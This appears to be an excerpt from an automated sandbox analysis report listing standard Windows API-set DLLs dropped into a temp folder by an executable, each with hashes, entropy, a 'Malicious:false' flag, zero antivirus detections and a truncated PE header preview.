                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18696
                                                                                                                                                                                                          Entropy (8bit):6.998147659672995
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:yW1hWBJ9M7tOZk7Cjdks/nGfe4pBjSYj+a2W5RKTt3E2sVWQ4GWJ9xqZsqnajkZ9:yW1hW+5OZkum0GftpBjt7m3SlGlmToC
                                                                                                                                                                                                          MD5:CCE27FF9B1E78B61955682788452F785
                                                                                                                                                                                                          SHA1:A2E2A40CEA25EA4FD64B8DEAF4FBE4A2DB94107A
                                                                                                                                                                                                          SHA-256:8EE2DE377A045C52BBB05087AE3C2F95576EDFB0C2767F40B13454F2D9F779DE
                                                                                                                                                                                                          SHA-512:1FCEC1CD70426E3895C48598DFC359839D2B3F2B1E3E94314872A866540353460EC932BF3841E5AFE89AA4D6C6FAC768E21AE368D68C2BB15F65960F6F5D7D5B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....QN.........." .........................................................0............`.........................................`...`............ ...................=..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):6.963329589517269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:fZlgW1hWiR+49Cjdks/nGfe4pBjSYBPq+W5RKTt3E2sVWQ4GWDG2Oqnajd2si3TT:hlgW1hWP4wm0GftpBjVsm3STlM/
                                                                                                                                                                                                          MD5:CDC266896E0DBE6C73542F6DEC19DE23
                                                                                                                                                                                                          SHA1:B4310929CCB82DD3C3A779CAB68F1F9F368076F2
                                                                                                                                                                                                          SHA-256:87A5C5475E9C26FABFEAD6802DAC8A62E2807E50E0D18C4BFADCB15EBF5BCBC0
                                                                                                                                                                                                          SHA-512:79A29041699F41938174A6EC9797FAF8D6BF7764657D801CB3AF15C225F8EAB0135D59CFA627BD02DD7459F7B857D62299E4D082586CE690627EBDF1267EBB21
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...T.*..........." .........................................................0......n.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18696
                                                                                                                                                                                                          Entropy (8bit):7.00560797197583
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:CW1hWiRnedXACjdks/nGfe4pBjSYC6rSW5RKTt3E2sVWQ4GW+60yqnaj/6g6dqpl:CW1hW3XRm0GftpBjl7m3SOLltFpU2
                                                                                                                                                                                                          MD5:39809CC5DABF769DA8871A91A8ED9E69
                                                                                                                                                                                                          SHA1:F779CDEF9DED19402AA72958085213D6671CA572
                                                                                                                                                                                                          SHA-256:5CD00FF4731691F81FF528C4B5A2E408548107EFC22CC6576048B0FDCE3DFBC9
                                                                                                                                                                                                          SHA-512:83A8246839D28378C6F6951D7593DC98B6CAA6DBCA5FBD023B00B3B1A9EBA0597943838C508493533C2DE276C4D2F9107D890E1C9A493EE834351CFF5DFD2CAB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...3Qb..........." .........................................................0......X.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19720
                                                                                                                                                                                                          Entropy (8bit):6.969703170679177
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:KvuBL3BYW1hWp5OZkum0GftpBjPJm3SyAlJrqsK:FBL3BTioViH+ElK
                                                                                                                                                                                                          MD5:5D5FAE1A17961D6EE37637F04FE99B8A
                                                                                                                                                                                                          SHA1:47143A66B4A2E2BA019BF1FD07BCCA9CFB8BB117
                                                                                                                                                                                                          SHA-256:8E01EB923FC453F927A7ECA1C8AA5643E43B360C76B648088F51B31488970AA0
                                                                                                                                                                                                          SHA-512:9DB32EC8416320DCB28F874B4679D2D47A5AE56317FDC9D2D65EBB553F1D6345C3DD0024294A671A694337683DD4E77254595A9CDBFE115C80D0EF53516D46AA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...:............." .........................................................0...........`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):21256
                                                                                                                                                                                                          Entropy (8bit):6.999439379402039
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:XOMw3zdp3bwjGjue9/0jCRrndb6kW1hW85OZkum0GftpBjcqEm3Shupl4aRGWa:XOMwBprwjGjue9/0jCRrndb0noVialbj
                                                                                                                                                                                                          MD5:588BD2A8E0152E0918742C1A69038F1D
                                                                                                                                                                                                          SHA1:9874398548891F6A08FC06437996F84EB7495783
                                                                                                                                                                                                          SHA-256:A07CC878AB5595AACD4AB229A6794513F897BD7AD14BCEC353793379146B2094
                                                                                                                                                                                                          SHA-512:32FFE64C697F94C4DB641AB3E20B0F522CF3EBA9863164F1F6271D2F32529250292A16BE95F32D852480BD1B59B8B0554C1E7FD7C7A336F56C048F4F56E4D62F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d.....=X.........." .........................................................0......c.....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):6.988263632360211
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:E8W1hWiEUcvHCjdks/nGfe4pBjSYY3iW5RKTt3E2sVWQ4GWRRhbOqnajd2si3Hv:E8W1hWXUQim0GftpBjMnm3So3ylMHv
                                                                                                                                                                                                          MD5:6DEF20ED13972F3C3F08DBA8ECF3D6CC
                                                                                                                                                                                                          SHA1:9C03356CF48112563BB845479F40BF27B293E95E
                                                                                                                                                                                                          SHA-256:C2E887A17875D39099D662A42F58C120B9CC8A799AFD87A9E49ADF3FADDD2B68
                                                                                                                                                                                                          SHA-512:5B4D2B1152BED14108DC58D358B1082E27DEFD1001D36CD72EC6F030A34D6CAF9B01C3C1DD8A9AC66D1937FCF86A6FE3469AC93B1E76D933A8F4B51C1F782F65
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d....`Z.........." .........................................................0......4.....`.........................................`...l............ ...................=..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18696
                                                                                                                                                                                                          Entropy (8bit):7.058960418674579
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:eW1hWU5OZkum0GftpBjxKvm3SQTlUK3dsDT:1noVimvf6sDT
                                                                                                                                                                                                          MD5:A056D4EEAAE37DEAB8333DCC4C910A93
                                                                                                                                                                                                          SHA1:CB59F1FE73C17446EB196FC0DD7D944A0CD9D81F
                                                                                                                                                                                                          SHA-256:593FA2AA2474508AD942BBAA0FDC9A1BADD81C85B0DFF1C43B90A47C23AD5FB7
                                                                                                                                                                                                          SHA-512:C2F811994182EF51D0C011C19336179DA69357E5F284F787BCDB54F90C32768A959232A477534F7E62CD3D71A048A13E91B20042E2FE6AB108D606C7C8DF9255
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...h..&.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19720
                                                                                                                                                                                                          Entropy (8bit):6.974766888869884
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:XnW1hWioe8Cjdks/nGfe4pBjSY6ydpW5RKTt3E2sVWQ4GWwvcUV2HPqnajkSXt7m:XnW1hWE1m0GftpBjZ4m3SZ7MvlJrU
                                                                                                                                                                                                          MD5:F3B4AB35A65A8D938C6B60AD59BA6E7F
                                                                                                                                                                                                          SHA1:2745259F4DBBEFBF6B570EE36D224ABDB18719BC
                                                                                                                                                                                                          SHA-256:EA2972FEC12305825162AE3E1AE2B6C140E840BE0E7EBB51A7A77B7FEEDA133A
                                                                                                                                                                                                          SHA-512:A88AFB66311494D6C15613C94555BA436CD2F75E11A49A448C9C6776DFBA24CDA25A44792A1E8B3E680C1AD3AD0574B43AC2328C6E41FF0832139C94B066DBF5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...+;P..........." .........................................................0.......}....`.........................................`...H............ ...................=..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20744
                                                                                                                                                                                                          Entropy (8bit):6.990402551132059
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:gWXk1JzNcKSIXW1hWEXRm0GftpBj1U6m3SddlmTod4V:gbcKSbxViZx8
                                                                                                                                                                                                          MD5:5FAF9A33BAB1D39DD9F820D34339B3D4
                                                                                                                                                                                                          SHA1:50699041060D14576ED7BACBD44BE9AF80EB902A
                                                                                                                                                                                                          SHA-256:A1221836731C7E52C42D5809CC02B17C5EC964601631EC15A84201F423DA4AC4
                                                                                                                                                                                                          SHA-512:73C25D1338DF9AEE5211FBB0E1B14E6BD853E31746C63BC46F44810622B09D52EE39B8E8A57C655DA63D3D3D4025C2CBA4D8673893D022417A2032BA3D935061
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...m..c.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):7.005927948691754
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:dtUDfIeFrW1hWC5OZkum0GftpBjVzm3Sx56lgCoha6LDF:dteFuJoVijz1HB
                                                                                                                                                                                                          MD5:D699333637DB92D319661286DF7CC39E
                                                                                                                                                                                                          SHA1:0BFFB9ED366853E7019452644D26E8E8F236241B
                                                                                                                                                                                                          SHA-256:FE760614903E6D46A1BE508DCCB65CF6929D792A1DB2C365FC937F2A8A240504
                                                                                                                                                                                                          SHA-512:6FA9FF0E45F803FAF3EB9908E810A492F6F971CB96D58C06F408980AB40CBA138B52D853AA0E3C68474053690DFAFA1817F4B4C8FB728D613696B6C516FA0F51
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................." .........................................................0.......4....`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18184
                                                                                                                                                                                                          Entropy (8bit):7.078838863546672
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:D4VW1hWc2TVCEmCjdks/nGfe4pBjSfMesvMW5RKTt3E2sVWQ4iWJBJ9qnajuZDAu:DyW1hWTvm0GftpBjosv5m3SKlUK3dsl
                                                                                                                                                                                                          MD5:7028CF6B6B609CB0E31ABD1F618E42D0
                                                                                                                                                                                                          SHA1:E7E0B18A40A35BD8B0766AC72253DE827432E148
                                                                                                                                                                                                          SHA-256:9E98B03A3CA1EBABDCEB7ED9C0CEB4912BB68EB68F3E0DF17F39C7A55FADA31D
                                                                                                                                                                                                          SHA-512:D035CCFD0DE316E64187C18E6E5B36E14F615F872C08740EC22EF2C12D592E37D78AB154202926A56AB01D669EB5870DFF651280A882D6BF2A700C43DCD25AC2
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...kl^w.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):6.970973012980799
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:OGeVWW1hWixluZCCjdks/nGfe4pBjSYW5lW5RKTt3E2sVWQ4GWavOqnajd2si3n:OGeVWW1hWbFm0GftpBj/m3S6lMn
                                                                                                                                                                                                          MD5:2166FB99DEBBB1B0649C4685CF630A4A
                                                                                                                                                                                                          SHA1:24F37D46DFC0EF303EF04ABF9956241AF55D25C9
                                                                                                                                                                                                          SHA-256:CDC4CFEBF9CBA85B0D3979BEFDB258C1F2CFCB79EDD00DA2DFBF389D080E4379
                                                                                                                                                                                                          SHA-512:DE27D06B1F306110B42D0ED2642A555862D0ADE7E56E5F2908E399F140AA5F43904E08D690BCB0D2F4D11D799EC18FA682DB048DA57D99CD99891E45ADD86371
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...9..\.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18696
                                                                                                                                                                                                          Entropy (8bit):7.023539681578989
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:eyMvxW1hWa3szm0GftpBjD0m3SojlD16huQf+:eyMvgZ8zViZ0sEG
                                                                                                                                                                                                          MD5:B7CBC8D977A00A2574E110B01124ED40
                                                                                                                                                                                                          SHA1:637E4A9946691F76E6DEB69BDC21C210921D6F07
                                                                                                                                                                                                          SHA-256:854DB7D2085CAACF83D6616761D8BDCBACB54A06C9A9B171B1C1A15E7DC10908
                                                                                                                                                                                                          SHA-512:B415EF4092FA62D39941BF529A2032BC8B591C54ED2050EA4730F198899F147539B2C0E97F3C4F14848C71066924C1848AE5F07779A1A47AB4C5E46F02BE7258
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...c`.g.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):20744
                                                                                                                                                                                                          Entropy (8bit):6.945077946165594
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:vdv3V0dfpkXc0vVaRW1hWW5OZkum0GftpBjwRm3SklD16hpv:vdv3VqpkXc0vVaA9oVi67v
                                                                                                                                                                                                          MD5:6961BF5622FFCD14C16FBFC1296950A4
                                                                                                                                                                                                          SHA1:5584C189216A17228CCA6CD07037AAA9A8603241
                                                                                                                                                                                                          SHA-256:50A1542D16B42ECB3EDC1EDD0881744171EA52F7155E5269AD39234F0EA691DE
                                                                                                                                                                                                          SHA-512:A4D0C15ACBFF4E9140AE4264FA24BD4C65FB2D1052A0B37BF281498F3B641FEF563C18115511829A23340C9440F547028D36015BA38CBD51AD0744D44D5CCD87
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d................." .........................................................0.......D....`.........................................`...X............ ...................=..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):7.035970190329706
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ntZ3mW1hWig+49Cjdks/nGfe4pBjSYS6XXL6bW5RKTt3E2sVWQ4GWUFsqnajkZtu:ntZ3mW1hWA4wm0GftpBjbLZm3SElmTop
                                                                                                                                                                                                          MD5:47388F3966E732706054FE3D530ED0DC
                                                                                                                                                                                                          SHA1:A9AEBBBB73B7B846B051325D7572F2398F5986EE
                                                                                                                                                                                                          SHA-256:59C14541107F5F2B94BBF8686EFEE862D20114BCC9828D279DE7BF664D721132
                                                                                                                                                                                                          SHA-512:CCE1FC5BCF0951B6A76D456249997B427735E874B650E5B50B3D278621BF99E39C4FC7FEE081330F20762F797BE1B1C048CB057967EC7699C9546657B3E248EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d......&.........." .........................................................0.......N....`.........................................`...x............ ...................=..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19720
                                                                                                                                                                                                          Entropy (8bit):6.966818956285711
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:6dKIMF8XW1hWixu7jCjdks/nGfe4pBjSYmL8lW5RKTt3E2sVWQ4GWfO+psqnajkt:iZXW1hWxam0GftpBjxEm3SK2lmTo6N
                                                                                                                                                                                                          MD5:DF50047BBD2CF3A4B0CF0567514B464C
                                                                                                                                                                                                          SHA1:F20AE25484A1C1B43748A1F0C422F48F092AD2C1
                                                                                                                                                                                                          SHA-256:8310D855398F83CB5B9CA3ADEB358DA1354557AEC5C82C8EF91A29F79A47F620
                                                                                                                                                                                                          SHA-512:5C3BFC2CCB2EE864B99F6709677474327E85889F4C962EA0A1EF9E1E876DC88B1D8E8E0F6C1422F634FF1C84A861C34E52EE07DAC7FDDE505B508BEA80562B9F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...B............." .........................................................0.......7....`.........................................`...H............ ...................=..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19208
                                                                                                                                                                                                          Entropy (8bit):7.033308637681508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:bW1hWipu7jCjdks/nGfe4pBjSYpGQjW5RKTt3E2sVWQ4GWqsegPBOqnajd2si3Ed:bW1hWJam0GftpBjEm3SPZlMELmA
                                                                                                                                                                                                          MD5:F62B66F451F2DAA8410AD62D453FA0A2
                                                                                                                                                                                                          SHA1:4BF13DB65943E708690D6256D7DDD421CC1CC72B
                                                                                                                                                                                                          SHA-256:48EB5B52227B6FB5BE70CB34009C8DA68356B62F3E707DB56AF957338BA82720
                                                                                                                                                                                                          SHA-512:D64C2A72ADF40BD451341552E7E6958779DE3054B0CF676B876C3BA7B86147AECBA051AC08ADC0C3BFB2779109F87DCA706C43DE3CE36E05AF0DDEE02BBBF419
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...)3............" .........................................................0............`.........................................`...H............ ...................=..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18696
                                                                                                                                                                                                          Entropy (8bit):6.988420393814923
                                                                                                                                                                                                          Encrypted:false
